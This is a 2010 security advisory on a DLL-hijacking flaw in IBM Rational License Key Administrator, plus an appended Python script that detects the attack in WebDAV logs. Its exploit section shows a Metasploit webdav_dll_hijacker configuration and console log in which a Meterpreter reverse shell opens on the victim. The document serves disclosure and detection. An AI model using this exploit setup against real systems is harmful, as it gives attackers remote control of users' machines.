Advisory: IBM Rational License Key Administrator - DLL Hijacking [Update: 30.08.2010]

---------------------------------------------
IBM Rational License Key Administrator - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- IBM Rational License Key Administrator Description

The IBM Rational® License Key Administrator (LKAD) is installed with many IBM Rational products and with your IBM Rational License Server software. This application provides an interface to IBM Rational Common Licensing (powered by FLEXlm software). Use the LKAD or the LKAD wizard to enter or import license keys and change your license configuration.

- Insecure Library Loading Allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS upd"

For more vulnerability details please check the links in the reference section.

- Affected Versions

2002.05.00 (included in AppScan 9) - other releases may also be affected.
Update: 7.0.0.0 fixed

- Solution

At the time of the original advisory it was not known whether fixed releases were available.
Update: upgrading to 7.0.0.0 or later should fix this issue.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

http://www-01.ibm.com/software/rational/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories

- Exploit example

msf exploit(webdav_dll_hijacker) > set EXTENSIONS upd
EXTENSIONS => upd
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  upd              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND /
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49253 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 6 opened (10.8.28.9:4444 -> 10.8.28.55:49256) at Sun Aug 29 21:24:02 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: m1k3-Vista\m1k3
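As an added illustration from the defender's side (not part of the advisory and not Metasploit code), the Python below parses request lines in the shape of the console output above and flags any client whose PROPFIND lookups reach for a .dll or .exe on the share, which is the trace a vulnerable application's library search path leaves on a WebDAV server. The sample log is constructed from the lines above; the second client, 10.8.28.12, is an invented benign case that only opens a document.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the webdav_dll_hijacker output above;
# the second client (10.8.28.12) is an invented benign control case.
SAMPLE_LOG = """\
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
[*] 10.8.28.12:50001 PROPFIND /documents/report.upd
[*] 10.8.28.12:50001 PROPFIND => 207 File (/documents/report.upd)
"""

# Code extensions an application should never resolve from a document share.
BINARY_EXT = (".dll", ".exe", ".ocx", ".cpl")

REQUEST = re.compile(r"^\[\*\] (\S+):\d+ ([A-Z]+) (/\S*)$")
RESPONSE = re.compile(r"^\[\*\] (\S+):\d+ ([A-Z]+) => (\d{3})(?: \w+)?(?: \((/[^)]*)\))?$")
PAYLOAD = re.compile(r"^\[\*\] (\S+):\d+ GET => (.+)$")


def find_remote_binary_loads(log_text):
    """Return {client: [(path, status, fetched)]} for every client that probed
    the share for a DLL/EXE name: the signature of a Windows library search
    path reaching a WebDAV directory. 'fetched' is True when the server then
    handed out a DLL body for a lookup that had been answered with 207."""
    pending = {}                 # (client, path) -> index into findings[client]
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            client, method, path = m.groups()
            if method == "PROPFIND" and path.lower().endswith(BINARY_EXT):
                findings[client].append([path, None, False])
                pending[(client, path)] = len(findings[client]) - 1
            continue
        m = RESPONSE.match(line)
        if m:
            client, _method, status, path = m.groups()
            idx = pending.pop((client, path), None)
            if idx is not None:
                findings[client][idx][1] = int(status)
            continue
        m = PAYLOAD.match(line)
        if m and "DLL" in m.group(2):
            # The GET follows the PROPFIND that was answered 207: mark it fetched.
            for entry in reversed(findings.get(m.group(1), [])):
                if entry[1] == 207 and not entry[2]:
                    entry[2] = True
                    break
    return {c: [tuple(e) for e in v] for c, v in findings.items()}
```

A real WebDAV or proxy access log carries the same client, method, path and status fields, so only the three regexes need adapting to its format.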